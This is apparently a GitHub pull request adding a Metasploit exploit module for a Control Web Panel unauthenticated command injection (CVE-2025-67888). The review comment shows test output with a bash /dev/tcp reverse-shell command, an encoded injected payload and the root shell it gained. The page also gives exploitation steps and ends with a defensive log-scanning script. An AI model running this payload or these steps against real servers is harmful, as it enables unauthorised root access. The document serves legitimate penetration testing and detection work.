Adds module for Control Web Panel API Command Injection (CVE-2025-67888) #20806
Conversation
Co-authored-by: Julien Voisin <[email protected]>
Co-authored-by: Julien Voisin <[email protected]>
…y single-line conditional - Remove unnecessary return keyword
…pears to CheckCode::Vulnerable - Add cmd/base64 encoder in Payload hash for Unix Command target - Simplify execute_command by removing manual base64 encoding
@JohannesLks would you mind providing a bit clearer installation steps? I've been trying to install the CWP on fresh CentOS 7 using this, but no luck so far, so I wanted to check what your approach was for setting up the target?

@msutovsky-r7 I also had a hard time setting it up, it's not straightforward. I used CentOS 8 and I needed to modify the installation script. This should work, if you still hit a wall I am happy to help, but I think that was all it needs.
msutovsky-r7
left a comment
```
msf exploit(linux/http/control_web_panel_api_cmd_exec) > run verbose=true
[+] bash -c '0<&67-;exec 67<>/dev/tcp/192.168.168.128/4444;sh <&67 >&67 2>&67'
[*] Started reverse TCP handler on 192.168.168.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking vulnerability with sleep command (waiting 10 seconds)...
[*] Elapsed time: 10.31 seconds
[+] The target is vulnerable. Server waited 10.31 seconds (expected >= 10).
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Executing command: echo${IFS}YmFzaCAtYyAnMDwmMTU5LTtleGVjIDE1OTw+L2Rldi90Y3AvMTkyLjE2OC4xNjguMTI4LzQ0NDQ7c2ggPCYxNTkgPiYxNTkgMj4mMTU5Jw==|((command${IFS}-v${IFS}base64>/dev/null&&(base64${IFS}--decode||base64${IFS}-d))||(command${IFS}-v${IFS}openssl>/dev/null&&openssl${IFS}enc${IFS}-base64${IFS}-d))|sh
[*] Command shell session 1 opened (192.168.168.128:4444 -> 192.168.168.229:43278) at 2026-01-12 15:48:37 +0100
id
uid=0(root) gid=0(root) groups=0(root)
```
Release Notes

This adds a new module for Control Web Panel (CVE-2025-67888). The vulnerability is unauthenticated OS command injection through an exposed API. The module requires Softaculous to be installed.
Fixes #20788
Add Control Web Panel API Command Injection Exploit (CVE-2025-67888)
This PR adds a new exploit module for CVE-2025-67888, an unauthenticated OS command injection vulnerability in Control Web Panel (CWP) versions <= 0.9.8.1208.
What does this change do?

Adds `exploit/linux/http/control_web_panel_api_cmd_exec`, which exploits a blind command injection via the `key` GET parameter in `/admin/index.php` when `api=1` is set. Successful exploitation grants root-level access.

Prerequisites: Softaculous and/or SitePad must be installed via CWP Scripts Manager.
Files Added

- `modules/exploits/linux/http/control_web_panel_api_cmd_exec.rb`
- `documentation/modules/exploit/linux/http/control_web_panel_api_cmd_exec.md`

Verification

```
msfconsole
use exploit/linux/http/control_web_panel_api_cmd_exec
set RHOSTS <target>
set RPORT 2031
set SSL true
set LHOST <attacker>
check
set payload cmd/unix/reverse_bash
exploit
```

References
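As an added, defender-side example (not part of this PR or the Metasploit module): a small Python scanner over constructed web-server access log lines that flags the request shape described above, a GET to `/admin/index.php` with `api=1` whose `key` parameter carries shell metacharacters, or whose response time is long enough to match the module's sleep-based check. The log format (combined format with a trailing request time), the 5-second threshold and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Shell metacharacters that never belong in an API key value; "${IFS}" is
# caught by the "$" and "{" entries.
META = re.compile(r"[;|&`$(){}<>]")
# The module's check injects "sleep 10"; a CWP API call should never take that long.
SLOW_SECONDS = 5.0  # assumed threshold

# Combined log format with the request time in seconds appended (as nginx's
# $request_time would give). Assumed layout for this example.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ (?P<rt>\d+\.\d+)$'
)

def classify(line):
    """Return a finding dict for a suspicious CWP API request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # malformed or foreign line: skip rather than guess
    url = urlsplit(m["target"])
    if url.path != "/admin/index.php":
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if params.get("api") != ["1"] or "key" not in params:
        return None
    key = params["key"][0]  # parse_qs has already percent-decoded the value
    reasons = []
    if META.search(key):
        reasons.append("shell-metacharacters")
    if float(m["rt"]) >= SLOW_SECONDS:
        reasons.append("slow-response")
    return {"src": m["src"], "ts": m["ts"], "key": key, "reasons": reasons} if reasons else None

def scan(log_text):
    """Run classify() over every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]

# Constructed sample: a timing probe, a percent-encoded injected command,
# a benign call with a plain key, and a request to a different script.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jan/2026:15:48:27 +0100] "GET /admin/index.php?api=1&key=sleep%2010 HTTP/1.1" 200 512 10.31
203.0.113.5 - - [12/Jan/2026:15:48:37 +0100] "GET /admin/index.php?api=1&key=echo%24%7BIFS%7DYmFzaA%3D%3D%7Csh HTTP/1.1" 200 0 0.12
198.51.100.7 - - [12/Jan/2026:15:50:01 +0100] "GET /admin/index.php?api=1&key=3f9a1c0de5b7 HTTP/1.1" 200 1024 0.05
198.51.100.7 - - [12/Jan/2026:15:50:02 +0100] "GET /index.php?key=a%7Cb HTTP/1.1" 200 300 0.03
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["src"], f["reasons"], repr(f["key"]))
```

The first sample line is caught only by its response time, which is the signal a blind, sleep-based probe leaves even when the injected string looks harmless.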